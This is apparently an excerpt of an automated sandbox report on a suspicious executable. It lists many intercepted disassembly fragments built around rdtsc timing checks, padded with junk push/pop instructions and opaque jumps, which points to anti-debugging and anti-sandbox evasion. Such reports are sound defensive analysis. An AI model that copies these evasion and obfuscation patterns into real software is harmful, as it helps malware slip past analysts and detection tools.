                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C75A second address: B9C760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C760 second address: B9C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C764 second address: B9C773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C773 second address: B9C777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C777 second address: B9C77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9E892 second address: B9E896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9E896 second address: B9E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007FB3DD3D95EEh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BA1B64 second address: BA1B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B842 second address: B9B84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B84C second address: B9B850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9FC2F second address: B9FC39 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BA33E4 second address: BA3487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FB3DD280BB6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FB3DD280BBDh 0x00000016 mov edi, ecx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov di, DCBDh 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jbe 00007FB3DD280BBCh 0x00000030 or dword ptr [ebp+122D2618h], edx 0x00000036 mov ebx, 28D28FA6h 0x0000003b mov eax, dword ptr [ebp+122D07E9h] 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007FB3DD280BB8h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b sub dword ptr [ebp+122D3770h], ecx 0x00000061 push FFFFFFFFh 0x00000063 push 00000000h 0x00000065 push esi 0x00000066 call 00007FB3DD280BB8h 0x0000006b pop esi 0x0000006c mov dword ptr [esp+04h], esi 0x00000070 add dword ptr [esp+04h], 0000001Ch 0x00000078 inc esi 0x00000079 push esi 0x0000007a ret 0x0000007b pop esi 0x0000007c ret 0x0000007d push eax 0x0000007e jc 00007FB3DD280BC2h 0x00000084 jp 00007FB3DD280BBCh 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9BE second address: B4C9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9C2 second address: B4C9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9DF second address: B4CA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007FB3DD3D95F8h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAAB65 second address: BAAB91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB3DD280BBCh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FB3DD280BCBh 0x00000015 jmp 00007FB3DD280BBBh 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE58 second address: B3BE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE5E second address: B3BE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE63 second address: B3BE72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FB3DD3D95E6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFDC3 second address: BAFDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF51 second address: BAFF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF55 second address: BAFF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF59 second address: BAFF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF65 second address: BAFF7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f js 00007FB3DD280BB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF7C second address: BAFF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF85 second address: BAFF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5000 second address: BB5004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5004 second address: BB5008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5008 second address: BB500E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB51A7 second address: BB521E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jg 00007FB3DD280BC9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FB3DD280BC4h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push ebx 0x0000001e jmp 00007FB3DD280BC8h 0x00000023 pop ebx 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d js 00007FB3DD280BC0h 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5301 second address: BB5306 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B49550 second address: B4955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4955C second address: B49561 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAA57 second address: BBAA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAA6C second address: BBAA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FB3DD3D95E6h 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f push ebx 0x00000010 ja 00007FB3DD3D95E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBABA4 second address: BBABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBABC3 second address: BBABC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBABC7 second address: BBABCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBABCD second address: BBABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBABD3 second address: BBABF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC1h 0x00000007 jc 00007FB3DD280BBEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAD4B second address: BBAD51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAD51 second address: BBAD7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FB3DD280BB6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007FB3DD280BC7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAD7B second address: BBAD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBB050 second address: BBB05A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBB05A second address: BBB073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBB073 second address: BBB07F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBB07F second address: BBB085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC2991 second address: BC2997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC2997 second address: BC299B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BC19A7 second address: BC19B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB3DD280BB6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F862 second address: B8F8AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FB3DD3D95E8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 xor dl, FFFFFF85h 0x00000029 lea eax, dword ptr [ebp+1248A4A9h] 0x0000002f xor di, CB50h 0x00000034 mov edx, dword ptr [ebp+122D35D2h] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007FB3DD3D95E6h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F8AF second address: B8F8B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F8B5 second address: B8F8D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB3DD3D95E6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB3DD3D95F0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F8D7 second address: B8F8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F8DB second address: B6BB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FB3DD3D95F8h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f sbb cl, 0000006Bh 0x00000012 call dword ptr [ebp+1244C9EDh] 0x00000018 pushad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F9CB second address: B8F9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8F9CF second address: B8FA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov cx, 8F8Fh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FB3DD3D95E8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f cmc 0x00000030 adc di, B9B6h 0x00000035 mov ecx, 14C991BFh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 movzx edx, bx 0x00000044 mov dword ptr [ebp+1248A501h], esp 0x0000004a mov dword ptr [ebp+122D222Eh], eax 0x00000050 cmp dword ptr [ebp+122D2B3Eh], 00000000h 0x00000057 jne 00007FB3DD3D96DCh 0x0000005d mov di, CFA1h 0x00000061 mov byte ptr [ebp+122D2BE8h], 00000047h 0x00000068 jmp 00007FB3DD3D95F7h 0x0000006d mov eax, D49AA7D2h 0x00000072 mov cx, AB5Ch 0x00000076 mov dh, A9h 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jbe 00007FB3DD3D95FAh 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8FA7E second address: B8FAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3DD280BC7h 0x00000008 jo 00007FB3DD280BB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 ja 00007FB3DD280BD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8FD5B second address: B8FD60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8FF24 second address: B8FF54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0C344069h 0x00000011 mov edi, 5FC83CEDh 0x00000016 push 7D0BE812h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB3DD280BC3h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90089 second address: B9009A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3DD3D95E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9009A second address: B900A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B903D3 second address: B903DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FB3DD3D95ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9084B second address: B90881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD280BBBh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D25D8h], eax 0x00000015 push 0000001Eh 0x00000017 jmp 00007FB3DD280BC2h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90881 second address: B90887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90887 second address: B90898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FB3DD280BB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90AF6 second address: B90AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90AFC second address: B90B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B01 second address: B90B16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB3DD3D95E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B16 second address: B90B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B1B second address: B90B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB3DD3D95F8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B50 second address: B90B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB3DD280BB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B5A second address: B90B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90B6F second address: B90B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90C52 second address: B90C5C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90C5C second address: B90C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB3DD280BB6h 0x00000009 jmp 00007FB3DD280BBCh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90C7A second address: B90C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90C7F second address: B90C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B90C85 second address: B90D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+1248A4EDh] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FB3DD3D95E8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ecx, dword ptr [ebp+124653CCh] 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007FB3DD3D95F8h 0x00000039 push esi 0x0000003a push eax 0x0000003b pop eax 0x0000003c pop esi 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 sub dword ptr [ebp+1245A303h], edx 0x00000047 lea eax, dword ptr [ebp+1248A4A9h] 0x0000004d jl 00007FB3DD3D95ECh 0x00000053 mov edx, dword ptr [ebp+122D2AF2h] 0x00000059 nop 0x0000005a jmp 00007FB3DD3D95F2h 0x0000005f push eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 